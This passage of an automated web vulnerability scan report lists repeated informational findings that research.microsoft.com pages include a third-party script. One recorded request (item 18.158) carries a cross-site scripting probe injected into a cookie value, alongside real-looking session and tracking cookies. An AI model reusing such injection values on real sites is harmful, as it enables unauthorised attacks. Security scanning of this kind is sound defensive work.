Path:	/en-us/people/krw/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/people/krw/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.156. http://research.microsoft.com/en-us/people/kstrauss/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/kstrauss/

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/people/kstrauss/ HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.157. http://research.microsoft.com/en-us/people/larus/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/larus/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/people/larus/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.158. http://research.microsoft.com/en-us/people/lilich/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/lilich/

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/people/lilich/ HTTP/1.1
Host: research.microsoft.com
Proxy-Connection: keep-alive
Referer: http://research.microsoft.com/en-us/about/directors.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=f4593467ede44f6aaa7ee86821872394&HASH=f459&LV=20118&V=3; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23; MS_WT=ta_MSCOM_0={"Value":"{\"_wt.control-327131-ta_MSCOM_0\":{\"value\":\"{\\\"runid\\\":\\\"350161\\\",\\\"testid\\\":\\\"347134\\\",\\\"trackid\\\":\\\"350164\\\",\\\"typeid\\\":\\\"1\\\"}\"},\"_wt.user-327131\":{\"value\":\"{\\\"currentPath\\\":\\\"327131-ta_MSCOM_0-350161-350164\\\",\\\"uid\\\":\\\"4824407653540645216\\\",\\\"userSession\\\":\\\"1314992019982-13149920199826988\\\"}\"}}","Expires":"\/Date(1322768021129)\/"}; mcI=Sat, 10 Sep 2011 01:57:49 GMT; A=I&I=AxUFAAAAAAALCQAAtHepBqhKdMJHRzuiM0jZ/g!!&GO=244&CS=117\Gi002j50206; WT_NVR_RU=0=msdn|technet:1=:2=; netreflector=1; _wt.user-311121=1027e544307e5d8b7f05c10e3b31d5d888fad471507d3a52761a2dde11c5f7a91489ba34c786403712645ac8b0e364da72498d40a091deec9e4f89eb126b6c656aafdc846839212b719c52abccb3c9c17421dc888a96dcf02a75b6eee126fd20e30801c4d9e9; _wt.control-311121-ta_MSTemplateHeaderProject_0=1027f65025696c976a36cb5869679d8fdee7c73217227e42357f42be7198a2e049cae273fb8652271e722880fdba35813e2e844fbf8792a6c61dcfcc391d040667abc1920b5648175cda0d018a822c; _opt_vi_7U7CE9V4=C47D4E76-7720-4371-B3BB-F8A565CEC250; WT_FPC=id=50.23.123.106-382843424.30173056:lv=1315007180799:ss=1315004267204; msdn=L=1033; Microsoft.com=SS=280&SS_Refn=150&SS_Url=http://social.msdn.microsoft.com/Search/en-US/?query=xss&rq=meta:Search.MSForums.ForumID(89a61008-0ec7-44d2-8e8e-f4298bd11382)+site:microsoft.com&rn=Announcements+for+all+Forums+Forum~~9/3/2011 2:45:57 AM; omniID=1314964195919_2acb_27e1_036d_ce34d5420c63; MSID=Microsoft.CreationDate=09/02/2011 11:43:32&Microsoft.LastVisitDate=09/03/2011 02:46:31&Microsoft.VisitStartDate=09/03/2011 01:57:14&Microsoft.CookieId=c79a9875-a200-46b5-bc88-db1c768a3311&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=57&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0666-6092-7684-7665; UserState=Returning=False&LastVisit=09/03/2011 02:47:11&UserEBacExpression=+ 0|2 + 1|8 2|1024; MSPartner2=LogUser=7e494b87-8d62-4e5e-8051-b07cbe0c11e8&RegUser=; SH=xss||xss.cx sqli httpi dork ghdb bhdb||27b6a"style="x :expression(alert(1)) "d048afd9275||xss txt css img help faq||faq help windows 7; s_cc=true; s_sq=msnportalbetarmc%3D%2526pid%253DMicrosoft%252520Research%252520Leadership%252520-%252520Microsoft%252520Research%2526pidt%253D1%2526oid%253Dhttp%25253A//research.microsoft.com/en-us/people/lilich/%2526ot%253DA

Response

18.159. http://research.microsoft.com/en-us/people/lilich/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/lilich/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/people/lilich/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.160. http://research.microsoft.com/en-us/people/lintaoz/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/lintaoz/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/people/lintaoz/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.161. http://research.microsoft.com/en-us/people/liuj/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/liuj/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/people/liuj/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.162. http://research.microsoft.com/en-us/people/lomet/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/lomet/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/people/lomet/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.163. http://research.microsoft.com/en-us/people/luca/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/luca/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/people/luca/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.164. http://research.microsoft.com/en-us/people/malvar/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/malvar/

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/people/malvar/ HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.165. http://research.microsoft.com/en-us/people/malvar/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/malvar/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/people/malvar/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.166. http://research.microsoft.com/en-us/people/manuelc/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/manuelc/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/people/manuelc/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.167. http://research.microsoft.com/en-us/people/marycz/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/marycz/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/people/marycz/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.168. http://research.microsoft.com/en-us/people/mds/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/mds/

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/people/mds/ HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.169. http://research.microsoft.com/en-us/people/mds/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/mds/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/people/mds/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.170. http://research.microsoft.com/en-us/people/milanv/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/milanv/

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/people/milanv/ HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.171. http://research.microsoft.com/en-us/people/milanv/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/milanv/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/people/milanv/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.172. http://research.microsoft.com/en-us/people/mzh/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/mzh/

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/people/mzh/ HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.173. http://research.microsoft.com/en-us/people/najork/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/najork/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/people/najork/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.174. http://research.microsoft.com/en-us/people/pachou/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/pachou/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/people/pachou/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.175. http://research.microsoft.com/en-us/people/padmanab/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/padmanab/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/people/padmanab/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.176. http://research.microsoft.com/en-us/people/palarson/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/palarson/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/people/palarson/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.177. http://research.microsoft.com/en-us/people/parno/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/parno/

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/people/parno/ HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.178. http://research.microsoft.com/en-us/people/philbe/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/philbe/

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/people/philbe/ HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.179. http://research.microsoft.com/en-us/people/philbe/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/philbe/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/people/philbe/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.180. http://research.microsoft.com/en-us/people/ramjee/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/ramjee/

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/people/ramjee/ HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.181. http://research.microsoft.com/en-us/people/ranveer/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/ranveer/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/people/ranveer/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.182. http://research.microsoft.com/en-us/people/rashid/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/rashid/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/people/rashid/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.183. http://research.microsoft.com/en-us/people/richdr/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/richdr/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/people/richdr/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.184. http://research.microsoft.com/en-us/people/robertson/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/robertson/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/people/robertson/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.185. http://research.microsoft.com/en-us/people/roylevin/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/roylevin/

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/people/roylevin/ HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.186. http://research.microsoft.com/en-us/people/sdumais/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/sdumais/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/people/sdumais/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.187. http://research.microsoft.com/en-us/people/shuvendu/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/shuvendu/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/people/shuvendu/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.188. http://research.microsoft.com/en-us/people/simonpj/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/simonpj/

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/people/simonpj/ HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.189. http://research.microsoft.com/en-us/people/simonpj/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/simonpj/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/people/simonpj/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.190. http://research.microsoft.com/en-us/people/spli/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/spli/

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/people/spli/ HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.191. http://research.microsoft.com/en-us/people/surajitc/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/surajitc/

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/people/surajitc/ HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.192. http://research.microsoft.com/en-us/people/surajitc/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/surajitc/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/people/surajitc/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.193. http://research.microsoft.com/en-us/people/terry/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/terry/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/people/terry/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.194. http://research.microsoft.com/en-us/people/thekkath/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/thekkath/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/people/thekkath/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.195. http://research.microsoft.com/en-us/people/thoare/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/thoare/

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/people/thoare/ HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.196. http://research.microsoft.com/en-us/people/thoare/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/thoare/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/people/thoare/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.197. http://research.microsoft.com/en-us/people/tonyhey/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/tonyhey/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/people/tonyhey/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.198. http://research.microsoft.com/en-us/people/tsharp/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/tsharp/

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/people/tsharp/ HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.199. http://research.microsoft.com/en-us/people/wenwuzhu/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/wenwuzhu/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/people/wenwuzhu/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.200. http://research.microsoft.com/en-us/people/wobber/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/wobber/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/people/wobber/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.201. http://research.microsoft.com/en-us/people/wong/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/wong/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/people/wong/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.202. http://research.microsoft.com/en-us/people/wyma/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/wyma/

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/people/wyma/ HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.203. http://research.microsoft.com/en-us/people/zhao/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/zhao/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/people/zhao/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.204. http://research.microsoft.com/en-us/press/ablake.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/press/ablake.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/press/ablake.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.205. http://research.microsoft.com/en-us/press/anandan.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/press/anandan.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/press/anandan.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.206. http://research.microsoft.com/en-us/press/bainguo.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/press/bainguo.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/press/bainguo.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.207. http://research.microsoft.com/en-us/press/borgs.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/press/borgs.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/press/borgs.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.208. http://research.microsoft.com/en-us/press/cmbishop.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/press/cmbishop.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/press/cmbishop.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.209. http://research.microsoft.com/en-us/press/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/press/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/press/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.210. http://research.microsoft.com/en-us/press/fastfacts.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
